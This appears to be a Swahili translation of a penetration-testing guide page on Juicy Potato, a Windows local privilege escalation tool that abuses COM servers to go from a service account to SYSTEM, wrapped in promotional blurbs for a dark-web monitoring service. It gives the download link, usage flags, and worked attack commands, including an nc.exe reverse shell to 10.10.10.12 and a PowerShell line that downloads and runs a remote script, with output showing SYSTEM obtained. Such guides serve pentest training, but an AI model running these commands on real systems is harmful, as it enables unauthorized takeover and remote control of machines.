WhiteIntel

WhiteIntel ni injini ya utafutaji inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia ikiwa kampuni au wateja wake wamekuwa compromised na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao bure kwenye:

WhiteIntel

Juicy Potato (kuabudu haki za dhahabu)

Versheni iliyopambwa ya RottenPotatoNG, ikiwa na juisi kidogo, yaani chombo kingine cha Kuongeza Haki za Mitaa, kutoka Akaunti za Huduma za Windows hadi NT AUTHORITY\SYSTEM

Unaweza kupakua juicypotato kutoka https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Muhtasari

Kutoka kwa juicy-potato Readme:

RottenPotatoNG na mabadiliko yake yanatumia mnyororo wa kuongeza haki kulingana na BITS huduma ikiwa na msikilizaji wa MiTM kwenye 127.0.0.1:6666 na unapokuwa na haki za SeImpersonate au SeAssignPrimaryToken. Wakati wa ukaguzi wa toleo la Windows tuligundua usanidi ambapo BITS ulikuwa umezimwa makusudi na bandari 6666 ilikuwa imechukuliwa.

Tuliamua kuunda silaha RottenPotatoNG: Sema hello kwa Juicy Potato.

Kwa nadharia, angalia Rotten Potato - Kuongeza Haki kutoka Akaunti za Huduma hadi SYSTEM na ufuate mnyororo wa viungo na rejeleo.

Tuligundua kwamba, mbali na BITS kuna seva kadhaa za COM tunaweza kuabudu. Zinahitaji tu:

1. kuwa na uwezo wa kuanzishwa na mtumiaji wa sasa, kawaida "mtumiaji wa huduma" ambaye ana haki za kujiwakilisha

2. kutekeleza interface ya IMarshal

3. kukimbia kama mtumiaji aliyeinuliwa (SYSTEM, Administrator, …)

Baada ya majaribio kadhaa tulipata na kujaribu orodha pana ya CLSID za kuvutia kwenye toleo kadhaa za Windows.

Maelezo ya Juicy

JuicyPotato inakuwezesha:

• CLSID ya Lengo chagua CLSID yoyote unayotaka. Hapa unaweza kupata orodha iliyopangwa kwa OS.

• Bandari ya Kusikiliza ya COM mwelekeo wa bandari ya kusikiliza ya COM unayopendelea (badala ya 6666 iliyohardcoded)

• Anwani ya IP ya Kusikiliza ya COM fungua seva kwenye IP yoyote

• Njia ya uundaji wa mchakato kulingana na haki za mtumiaji aliyejiwakilisha unaweza kuchagua kutoka:

• CreateProcessWithToken (inahitaji SeImpersonate)

• CreateProcessAsUser (inahitaji SeAssignPrimaryToken)

• zote

• Mchakato wa kuzindua anzisha executable au script ikiwa unyakuzi unafanikiwa

• Argumenti za Mchakato binafsisha hoja za mchakato ulioanzishwa

• Anwani ya Seva ya RPC kwa njia ya siri unaweza kujiandikisha kwa seva ya RPC ya nje

• Bandari ya Seva ya RPC inafaa ikiwa unataka kujiandikisha kwa seva ya nje na firewall inazuia bandari 135…

• MODE YA TESTI hasa kwa madhumuni ya majaribio, yaani, kujaribu CLSIDs. Inaunda DCOM na kuchapisha mtumiaji wa token. Angalia hapa kwa majaribio

Matumizi

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Mawazo ya Mwisho

Kutoka kwa juicy-potato Readme:

Ikiwa mtumiaji ana SeImpersonate au SeAssignPrimaryToken ruhusa basi wewe ni SYSTEM.

Ni karibu haiwezekani kuzuia matumizi mabaya ya COM Servers hizi zote. Unaweza kufikiria kubadilisha ruhusa za vitu hivi kupitia DCOMCNFG lakini bahati njema, hii itakuwa changamoto.

Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendesha chini ya akaunti za * SERVICE. Kuzuia DCOM hakika kutazuia exploit hii lakini kunaweza kuwa na athari kubwa kwenye OS inayotegemea.

Kutoka: http://ohpe.it/juicy-potato/

Mifano

Kumbuka: Tembelea ukurasa huu kwa orodha ya CLSIDs za kujaribu.

Pata nc.exe reverse shell

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell rev

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Launch a new CMD (if you have RDP access)

CLSID Problems

Mara nyingi, CLSID ya default ambayo JuicyPotato inatumia haifanyi kazi na exploit inashindwa. Kawaida, inachukua majaribio kadhaa kupata CLSID inayofanya kazi. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo maalum wa uendeshaji, unapaswa kutembelea ukurasa huu:

Checking CLSIDs

Kwanza, utahitaji baadhi ya executable mbali na juicypotato.exe.

Pakua Join-Object.ps1 na uipakie kwenye kikao chako cha PS, na pakua na uendeshe GetCLSID.ps1. Skripti hiyo itaunda orodha ya CLSIDs zinazowezekana za kujaribu.

Kisha pakua test_clsid.bat (badilisha njia ya orodha ya CLSID na kwa executable ya juicypotato) na uendeshe. Itaanza kujaribu kila CLSID, na wakati nambari ya bandari inabadilika, itamaanisha kwamba CLSID ilifanya kazi.

Angalia CLSIDs zinazofanya kazi ukitumia parameter -c

References

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel ni injini ya utafutaji inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia ikiwa kampuni au wateja wake wamekuwa compromised na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware ya kuiba taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao bure kwenye:

WhiteIntel